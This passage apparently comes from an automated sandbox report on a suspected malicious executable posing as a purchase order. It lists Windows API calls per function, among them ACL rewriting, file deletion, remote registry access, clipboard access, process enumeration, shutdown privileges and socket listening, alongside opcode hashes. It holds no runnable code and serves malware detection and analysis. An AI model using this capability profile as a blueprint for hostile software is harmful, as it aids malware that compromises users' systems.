                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                          • Part of subcall function 002EB982: GetProcessHeap.KERNEL32(00000008,002EB3E1,00000000,00000000,?,002EB3E1,?), ref: 002EB98E
                          • Part of subcall function 002EB982: HeapAlloc.KERNEL32(00000000,?,002EB3E1,?), ref: 002EB995
                          • Part of subcall function 002EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002EB3E1,?), ref: 002EB9A6
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002EB3FC
                        • _memset.LIBCMT ref: 002EB411
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002EB430
                        • GetLengthSid.ADVAPI32(?), ref: 002EB441
                        • GetAce.ADVAPI32(?,00000000,?), ref: 002EB47E
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002EB49A
                        • GetLengthSid.ADVAPI32(?), ref: 002EB4B7
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002EB4C6
                        • HeapAlloc.KERNEL32(00000000), ref: 002EB4CD
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002EB4EE
                        • CopySid.ADVAPI32(00000000), ref: 002EB4F5
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002EB526
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002EB54C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002EB560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: f008dd559f5779e79c2ba4727306ea0b6246e8490a88fdcf2610aaed98f96bda
                        • Instruction ID: c08aca40ad18595a915841fce48919ba9279e8a9ffb46b92469c240636c27c7b
                        • Opcode Fuzzy Hash: f008dd559f5779e79c2ba4727306ea0b6246e8490a88fdcf2610aaed98f96bda
                        • Instruction Fuzzy Hash: EA516B7195024AABDF06DFA2DC85AEFBB79FF04700F448129F915A72A1DB309A15CF60
                        Function 002F6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • _wcscat.LIBCMT ref: 002F6E7E
                        • __wsplitpath.LIBCMT ref: 002F6E99
                        • FindFirstFileW.KERNEL32(?,?), ref: 002F6EAE
                        • _wcscpy.LIBCMT ref: 002F6EDD
                        • _wcscat.LIBCMT ref: 002F6EEF
                        • _wcscat.LIBCMT ref: 002F6F01
                        • DeleteFileW.KERNEL32(?), ref: 002F6F0E
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F6F22
                        • FindClose.KERNEL32(00000000), ref: 002F6F3D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                        • String ID: \*.*
                        • API String ID: 2643075503-1173974218
                        • Opcode ID: e5f4394addf4ea584c84f5daad6459cc7c27f6f6ad24dd1f0ac7226b342a2415
                        • Instruction ID: 911620133eabf462e3b9be48476f42981c489fa14c76fc50e661ba7adc759e68
                        • Opcode Fuzzy Hash: e5f4394addf4ea584c84f5daad6459cc7c27f6f6ad24dd1f0ac7226b342a2415
                        • Instruction Fuzzy Hash: 9721E572418349AAC311EFA4D8899EBB7DC9F59354F044E2AF5D4C3142EA30D66C8B62
                        Function 002B5D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                        • API String ID: 0-2893523900
                        • Opcode ID: 3a1d17d27f106eb237b6dd3f045270a96d3f141be85f50fbc2592d6e76cfc8bc
                        • Instruction ID: 294d56097cc4cfca14711a7b55794716d79fd8537ffbbafcc8819bab90b62b10
                        • Opcode Fuzzy Hash: 3a1d17d27f106eb237b6dd3f045270a96d3f141be85f50fbc2592d6e76cfc8bc
                        • Instruction Fuzzy Hash: BF62A1B1E202199BDF25CF99C8807EEB7B5BF48350F15816AE845EB281D7749E90CF90
                        Function 003130AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0031317F
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0031321E
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003132B6
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003134F5
                        • RegCloseKey.ADVAPI32(00000000), ref: 00313502
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        • API String ID: 1240663315-0
                        • Opcode ID: 4e61ef80cc37c2239883a1209231fd2e83c295b5332ddc2238a8490e215fcfe0
                        • Instruction ID: 4296cde7cdf8774756940bd2cbf4ea4b9a9c7c3a30cd459cf87f3d1136405a37
                        • Opcode Fuzzy Hash: 4e61ef80cc37c2239883a1209231fd2e83c295b5332ddc2238a8490e215fcfe0
                        • Instruction Fuzzy Hash: B1E17B31214200AFCB19DF25C881EAABBE9EF88764F04896DF45ADB261DB30ED55CF51
                        Function 00307294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: 603aeea04d2d4b023c71023d2976df99fb85f64c0dbd07b61206429eb81413c4
                        • Instruction ID: 219e6e62bded50b0ebaafc367ec63f42d5fcaa1a0868da6db5954d16ef8a0ec4
                        • Opcode Fuzzy Hash: 603aeea04d2d4b023c71023d2976df99fb85f64c0dbd07b61206429eb81413c4
                        • Instruction Fuzzy Hash: 7A21D331614110AFD712AF24EC5AB6EB7ACEF04710F008019F909DB2A1DB30ED51CF90
                        Function 0030C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EA857: CLSIDFromProgID.OLE32 ref: 002EA874
                          • Part of subcall function 002EA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 002EA88F
                          • Part of subcall function 002EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 002EA89D
                          • Part of subcall function 002EA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002EA8AD
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0030C6AD
                        • _memset.LIBCMT ref: 0030C6BA
                        • _memset.LIBCMT ref: 0030C7D8
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0030C804
                        • CoTaskMemFree.OLE32(?), ref: 0030C80F
                        Strings
                        • NULL Pointer assignment, xrefs: 0030C85D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: 524b67f2e4edebe3bdb1389e4386277f8cd977aec97a779bf1a93092195702d1
                        • Instruction ID: 439c43d912d37864f7552c9b6133af0012e50fda718c4e80d3d36c51111a335a
                        • Opcode Fuzzy Hash: 524b67f2e4edebe3bdb1389e4386277f8cd977aec97a779bf1a93092195702d1
                        • Instruction Fuzzy Hash: 26916A71D11218AFDB11DFA0DC90EDEBBB9EF08750F20816AF519A7281EB705A54CFA0
                        Function 003024A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003024F6
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00302526
                        • _wcscmp.LIBCMT ref: 0030253A
                        • _wcscmp.LIBCMT ref: 00302555
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003025F3
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00302609
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        • API String ID: 713712311-438819550
                        • Opcode ID: 007d1f6630b3b9268ef4675f9927cdd9865f8ac3d38b6d8f050a2411145b2b1d
                        • Instruction ID: a11766a4dfa555c61c5f99b24a5f3a4e1b5269d9fa329df730e88639bb0adf43
                        • Opcode Fuzzy Hash: 007d1f6630b3b9268ef4675f9927cdd9865f8ac3d38b6d8f050a2411145b2b1d
                        • Instruction Fuzzy Hash: EA417D7190121AAFCF16DFA4CC99AEFBBB8FF05310F204456E815A61D1E7719A54CF50
                        Function 002B8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 093cc5856021b35fed208d9686db80a54fb45d1c35d16381bfbf55b1f3ae0467
                        • Instruction ID: 3ed4e568f17d40d4e3848edb8f76ee617d1440a58e65ea7bc64bb41c1b74e310
                        • Opcode Fuzzy Hash: 093cc5856021b35fed208d9686db80a54fb45d1c35d16381bfbf55b1f3ae0467
                        • Instruction Fuzzy Hash: E3929B71E2021ACBDF25CF68C8807EDB7B1BB54354F1585AAE91AAB280D7709DD1CF90
                        Function 002B8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: dd919f30bc902aaf2c3a0abf57011cd3e31f26060f2ff9832eaf31b5ea15f6c9
                        • Instruction ID: 9662ef5407df32b1fb4561a635b728ea10a6a0232bf8bf0681ea65fddfba689d
                        • Opcode Fuzzy Hash: dd919f30bc902aaf2c3a0abf57011cd3e31f26060f2ff9832eaf31b5ea15f6c9
                        • Instruction Fuzzy Hash: F7127D70A10619EFDF04DFA5D981AEEB7F9FF48340F204569E80AE7251EB35A921CB50
                        Function 002F82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002EBF0F
                          • Part of subcall function 002EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002EBF3C
                          • Part of subcall function 002EBEC3: GetLastError.KERNEL32 ref: 002EBF49
                        • ExitWindowsEx.USER32(?,00000000), ref: 002F830C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        • API String ID: 2234035333-194228
                        • Opcode ID: d71b92f480860f7a803829ec4faaf1229b463e1fc26e04684c8d75e5af149134
                        • Instruction ID: c57708aec69c9046a59afed143600b98b801176e96be3e04cb41eb7feb469148
                        • Opcode Fuzzy Hash: d71b92f480860f7a803829ec4faaf1229b463e1fc26e04684c8d75e5af149134
                        • Instruction Fuzzy Hash: A3018871B7431AAAF7695A689C8BBBBF25CDB00BC0F140474FB43D21E1DE909C2086A4
                        Function 003091DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00309235
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309244
                        • bind.WSOCK32(00000000,?,00000010), ref: 00309260
                        • listen.WSOCK32(00000000,00000005), ref: 0030926F
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309289
                        • closesocket.WSOCK32(00000000,00000000), ref: 0030929D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        • API String ID: 1279440585-0
                        • Opcode ID: 76c2b95a8e0ea7c1736365267ff25d7d4260112255ac3e0ce8d712b56bc9e254
                        • Instruction ID: 84b0821eaa8efea4eb752462d628ac0b3a5f286f33d7253ad70991c60d1bfcc4
                        • Opcode Fuzzy Hash: 76c2b95a8e0ea7c1736365267ff25d7d4260112255ac3e0ce8d712b56bc9e254
                        • Instruction Fuzzy Hash: 0221EC35600204AFCB12EF64DC95B6EB7ADAF84320F11855AF916AB3E2CB30AD41CB51
                        Function 002F6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002F6F7D
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F6F8D
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 002F6FAC
                        • __wsplitpath.LIBCMT ref: 002F6FD0
                        • _wcscat.LIBCMT ref: 002F6FE3
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002F7022
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                        • String ID:
                        • API String ID: 1605983538-0
                        • Opcode ID: d6bbd5042d3c60cd681322ae2d0785ef7dcfd81f479d27e6edbe05124d95ba0d
                        • Instruction ID: 2553ae1abc9e9833b50a5d1ab46a7fe9b9d134abfe15c62690669cacb42d57d8
                        • Opcode Fuzzy Hash: d6bbd5042d3c60cd681322ae2d0785ef7dcfd81f479d27e6edbe05124d95ba0d
                        • Instruction Fuzzy Hash: 16218371914219ABDB11AFA0DC88BEEB7BCAF08340F1004A9F605D3141EBB19F94CB60
                        Function 002B6670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: hN6$tM6
                        • API String ID: 4104443479-3368265714
                        • Opcode ID: f8bf22219e144f6be29c0bb0b457e71b926c37ffc7037611c6cc7d9c6cc1644c
                        • Instruction ID: d92b5a75576bc911605bc419b92e4d5e008cb95d29735a13f43911186f0d6cfd
                        • Opcode Fuzzy Hash: f8bf22219e144f6be29c0bb0b457e71b926c37ffc7037611c6cc7d9c6cc1644c
                        • Instruction Fuzzy Hash: D7A27874E10219CFCB29CF58C8846EDBBB1FF48354F2581AAE859AB390D7749D91CB90
                        Function 002BA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • _memmove.LIBCMT ref: 00323020
                        • _memmove.LIBCMT ref: 00323135
                        • _memmove.LIBCMT ref: 003231DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        • Opcode ID: 5042277e12a4fd3dc7404d3c464aeba66c18d6df0135a007120a0eebe63f1e5e
                        • Instruction ID: ad289b3f8f4ec6f58cd20e2a4383c4d839a6795fea147092e8b842d0e36ce060
                        • Opcode Fuzzy Hash: 5042277e12a4fd3dc7404d3c464aeba66c18d6df0135a007120a0eebe63f1e5e
                        • Instruction Fuzzy Hash: 0202B170A10205EFCF05DF68D981AAEB7B9EF48340F15C069E80ADB255EB35DE25CB91
                        Function 003096E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0030ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0030973D
                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00309760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastinet_addrsocket
                        • String ID:
                        • API String ID: 4170576061-0
                        • Opcode ID: cebba70ead24cef38e8cb53c205d84343f800291a9ebdfb804a7b5eff0a05872
                        • Instruction ID: 1c18a9da4245c71791867b174c08af44173536559da44521ebecf68a3e17f646
                        • Opcode Fuzzy Hash: cebba70ead24cef38e8cb53c205d84343f800291a9ebdfb804a7b5eff0a05872
                        • Instruction Fuzzy Hash: 2741EF70620204AFDB14AF28CC82FAEB3EDEF44764F14815DF956AB3D2CA749D118B91
                        Function 002FF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FF37A
                        • _wcscmp.LIBCMT ref: 002FF3AA
